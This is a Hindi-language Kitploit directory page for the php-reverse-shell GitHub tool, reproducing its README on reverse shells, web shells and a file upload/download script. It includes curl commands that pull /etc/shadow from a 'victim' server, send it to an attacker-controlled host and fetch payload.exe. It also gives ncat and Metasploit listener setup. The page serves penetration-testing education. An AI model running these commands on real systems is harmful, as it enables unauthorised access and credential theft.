Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
php-reverse-shell — PHP शेल जो Linux OS, macOS, और Windows OS पर काम करते हैं। | Kitploit
उपकरण/GitHubGitHub/ivan-sincek/php-reverse-shell
शोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगरिमोट एक्सेस टूल
GitHubivan-sincek/php-reverse-shell

php-reverse-shell

PHP शेल जो Linux OS, macOS, और Windows OS पर काम करते हैं।

रिपॉजिटरी देखें
571160167 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

PHP रिवर्स शेल

लोकप्रिय PHP रिवर्स शेल स्क्रिप्ट pentestmonkey/php-reverse-shell पर एक छोटा सा रिफ्रेश। मूल लेखक को श्रेय!

Linux OS और macOS पर /bin/sh के साथ और Windows OS पर cmd.exe के साथ काम करता है। स्क्रिप्ट स्वचालित रूप से अंतर्निहित OS का पता लगाएगी।

ncat और multi/handler दोनों के साथ काम करता है।

परीक्षण किया गया:

  • Linux के लिए XAMPP v7.3.19, Kali Linux v2020.2 (64-bit) पर PHP v7.3.19 के साथ,
  • OS X के लिए XAMPP v7.4.10, macOS Catalina v10.15.6 (64-bit) पर PHP v7.4.10 के साथ,
  • Windows के लिए XAMPP v7.4.3, Windows 10 Enterprise OS (64-bit) पर PHP v7.4.3 के साथ,
  • Docker इमेज nouphet/docker-php4, PHP v4.4.0 के साथ,
  • Docker इमेज steeze/php52-nginx, PHP v5.2.17 के साथ।

Windows OS पर प्रोसेस पाइप्स asynchronous ऑपरेशन्स का समर्थन नहीं करते, इसलिए stream_set_blocking(), stream_select(), और feof() ठीक से काम नहीं करेंगे, लेकिन मुझे एक वर्कअराउंड मिल गया है।

शैक्षिक उद्देश्यों के लिए बनाया गया है। आशा है यह मदद करेगा!

विषय-सूची

  • रिवर्स शेल्स
  • वेब शेल्स
  • फ़ाइल अपलोड/डाउनलोड स्क्रिप्ट
    • केस 1: स्क्रिप्ट को पीड़ित के सर्वर पर अपलोड करें
    • केस 2: स्क्रिप्ट को अपने सर्वर पर अपलोड करें
  • लिसनर सेट अप करें
  • इमेजेस

रिवर्स शेल्स

/src/reverse/php_reverse_shell.php को PHP v5.0.0 या उससे अधिक की आवश्यकता है।

/src/reverse/php_reverse_shell_older.php को PHP v4.3.0 या उससे अधिक की आवश्यकता है।

आवश्यकतानुसार स्क्रिप्ट्स के अंदर IP address और port number बदलें।

/src/reverse/php_reverse_shell.php को अपने सर्वर की web root डायरेक्टरी में कॉपी करें (जैसे XAMPP पर /opt/lampp/htdocs/ में) या इसे अपने टारगेट के web सर्वर पर अपलोड करें।

अपने पसंदीदा web browser के साथ फ़ाइल पर नेविगेट करें।

वेब शेल्स

HTTP POST request पर आधारित simple PHP web shell देखें।

HTTP GET request पर आधारित simple PHP web shell देखें। आपको अपने कमांड्स को URL encode करना होगा।

HTTP GET request पर आधारित simple PHP web shell v2 देखें। आपको अपने कमांड्स को URL encode करना होगा।

फ़ाइल अपलोड/डाउनलोड स्क्रिप्ट

फ़ाइल अपलोड के लिए HTTP POST request और फ़ाइल डाउनलोड के लिए HTTP GET request पर आधारित simple PHP file upload/download script देखें।

फ़ाइल डाउनलोड करते समय, आपको फ़ाइल पाथ को URL encode करना होगा।

सर्वर कॉन्फ़िगरेशन के आधार पर, HTTP GET request पैरामीटर के माध्यम से फ़ाइल डाउनलोड करना हमेशा काम नहीं कर सकता है; इसके बजाय, आपको स्क्रिप्ट में फ़ाइल पाथ को hardcode करना होगा।

केस 1: स्क्रिप्ट को पीड़ित के सर्वर पर अपलोड करें

अपने पसंदीदा web browser के साथ पीड़ित के web सर्वर पर स्क्रिप्ट पर नेविगेट करें, या अपने PC से cURL का उपयोग करें।

अपने PC से सर्वर की web root डायरेक्टरी में एक फ़ाइल अपलोड करें:

curl -skL -X POST https://victim.com/files.php -F file=@/root/payload.exe

सर्वर से अपने PC पर एक फ़ाइल डाउनलोड करें:

curl -skL -X GET https://victim.com/files.php?file=/etc/shadow -o shadow

यदि आपने अपने रिवर्स शेल के भीतर अपने प्रारंभिक विशेषाधिकारों को elevate कर लिया है, तो हो सकता है कि इस स्क्रिप्ट के पास शेल के समान विशेषाधिकार न हों। उस स्थिति में, किसी विशेष फ़ाइल को डाउनलोड करने के लिए, आपको फ़ाइल को web root डायरेक्टरी में कॉपी करने और आवश्यक read permissions सेट करने की आवश्यकता हो सकती है।

केस 2: स्क्रिप्ट को अपने सर्वर पर अपलोड करें

अपने PHP रिवर्स शेल से, निम्नलिखित cURL कमांड्स चलाएँ।

पीड़ित के PC से अपने सर्वर की web root डायरेक्टरी में एक फ़ाइल अपलोड करें:

curl -skL -X POST https://my-server.com/files.php -F file=@/etc/shadow

अपने सर्वर की web root डायरेक्टरी से पीड़ित के PC पर एक फ़ाइल डाउनलोड करें:

curl -skL -X GET https://my-server.com/files.php?file=/root/payload.exe -o payload.exe

curl -skL -X GET https://my-server.com/payload.exe -o payload.exe

लिसनर सेट अप करें

लिसनर सेट अप करने के लिए, Kali Linux पर अपना पसंदीदा कंसोल खोलें और नीचे दिए गए उदाहरणों में से एक चलाएँ।

ncat लिसनर सेट अप करें:

ncat -nvlp 9000

multi/handler लिसनर सेट अप करें:

msfconsole -q

use exploit/multi/handler

set PAYLOAD windows/shell_reverse_tcp

set LHOST 192.168.8.185

set LPORT 9000

exploit

इमेजेस

Ncat

चित्र 1 - Ncat

स्क्रिप्ट डंप

चित्र 2 - स्क्रिप्ट का डंप

टूल डाउनलोड करें